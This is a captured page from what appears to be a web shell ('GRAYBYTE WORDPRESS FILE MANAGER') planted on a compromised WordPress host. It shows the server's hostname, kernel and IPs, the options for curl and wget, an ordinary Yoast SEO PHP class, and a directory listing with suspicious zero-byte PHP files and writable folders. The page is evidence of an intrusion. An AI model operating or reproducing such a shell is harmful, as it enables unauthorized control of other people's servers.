✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ webm004.cluster127.gra.hosting.ovh.net ​🇻​♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.223
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/profile-git-objects//author-title-20260907013357.php
<?php

// phpcs:disable Yoast.NamingConventions.NamespaceName.TooLong
namespace Yoast\WP\SEO\User_Meta\Framework\Custom_Meta;

use Yoast\WP\SEO\Helpers\Options_Helper;
use Yoast\WP\SEO\User_Meta\Domain\Custom_Meta_Interface;

/**
 * The Author_Title custom meta.
 */
class Author_Title implements Custom_Meta_Interface {

	/**
	 * The options helper.
	 *
	 * @var Options_Helper
	 */
	private $options_helper;

	/**
	 * The constructor.
	 *
	 * @param Options_Helper $options_helper The options helper.
	 */
	public function __construct( Options_Helper $options_helper ) {
		$this->options_helper = $options_helper;
	}

	/**
	 * Returns the priority which the custom meta's form field should be rendered with.
	 *
	 * @return int The priority which the custom meta's form field should be rendered with.
	 */
	public function get_render_priority(): int {
		return 100;
	}

	/**
	 * Returns the db key of the Author_Title custom meta.
	 *
	 * @return string The db key of the Author_Title custom meta.
	 */
	public function get_key(): string {
		return 'wpseo_title';
	}

	/**
	 * Returns the id of the custom meta's form field.
	 *
	 * @return string The id of the custom meta's form field.
	 */
	public function get_field_id(): string {
		return 'wpseo_author_title';
	}

	/**
	 * Returns the meta value.
	 *
	 * @param int $user_id The user ID.
	 *
	 * @return string The meta value.
	 */
	public function get_value( $user_id ): string {
		return \get_the_author_meta( $this->get_key(), $user_id );
	}

	/**
	 * Returns whether the respective global setting is enabled.
	 *
	 * @return bool Whether the respective global setting is enabled.
	 */
	public function is_setting_enabled(): bool {
		return ( ! $this->options_helper->get( 'disable-author' ) );
	}

	/**
	 * Returns whether the custom meta is allowed to be empty.
	 *
	 * @return bool Whether the custom meta is allowed to be empty.
	 */
	public function is_empty_allowed(): bool {
		return true;
	}

	/**
	 * Renders the custom meta's field in the user form.
	 *
	 * @param int $user_id The user ID.
	 *
	 * @return void
	 */
	public function render_field( $user_id ): void {
		echo '

		<label for="' . \esc_attr( $this->get_field_id() ) . '">'
			. \esc_html__( 'Title to use for Author page', 'wordpress-seo' )
		. '</label>';

		echo '

		<input
			class="yoast-settings__text regular-text"
			type="text" id="' . \esc_attr( $this->get_field_id() ) . '"
			name="' . \esc_attr( $this->get_field_id() ) . '"
			value="' . \esc_attr( $this->get_value( $user_id ) )
		. '"/><br>';
	}
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
23 Sep 2026 4.33 AM
docteuh / users
0777
Handler
--
12 Sep 2026 9.24 PM
docteuh / users
0755
admin
--
13 Sep 2026 3.46 AM
docteuh / users
0755
admin-screens
--
10 Sep 2026 5.49 AM
docteuh / users
0755
apiclient-services
--
13 Sep 2026 3.42 PM
docteuh / users
0755
application
--
21 Sep 2026 1.05 PM
docteuh / users
0755
cloudflare
--
22 Sep 2026 4.33 AM
docteuh / users
0755
consent
--
10 Sep 2026 12.57 AM
docteuh / users
0755
js
--
22 Sep 2026 4.40 AM
docteuh / users
0755
js1ee1b0
--
11 Sep 2026 2.01 PM
docteuh / users
0755
languages
--
14 Sep 2026 5.17 AM
docteuh / users
0755
licensing
--
11 Sep 2026 4.04 AM
docteuh / users
0755
mediaelement
--
10 Sep 2026 8.21 PM
docteuh / users
0755
network
--
18 Sep 2026 3.32 AM
docteuh / users
0755
polyfill-php72
--
15 Sep 2026 11.18 PM
docteuh / users
0755
psr7
--
11 Sep 2026 10.03 PM
docteuh / users
0755
query
--
9 Sep 2026 9.47 PM
docteuh / users
0755
search-api
--
9 Sep 2026 8.38 AM
docteuh / users
0755
src
--
19 Sep 2026 7.27 PM
docteuh / users
0755
webmaster
--
22 Sep 2026 11.24 AM
docteuh / users
0755
admin.php
0 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
animations-20260913021814.css
13.106 KB
20 Nov 2023 7.11 PM
docteuh / users
0644
author-title-20260907013357.php
2.489 KB
23 Jun 2026 6.19 PM
docteuh / users
0644
cjfuns.php
0 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
icon-redirect-manager.svg
1.299 KB
23 Jun 2026 6.19 PM
docteuh / users
0644
index.php
0 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
license.txt
0.067 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
network.php
0 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
profile.php
0 KB
6 Sep 2026 3.24 PM
docteuh / users
0644
typography-20260912121827.css
6.292 KB
20 Nov 2023 7.11 PM
docteuh / users
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF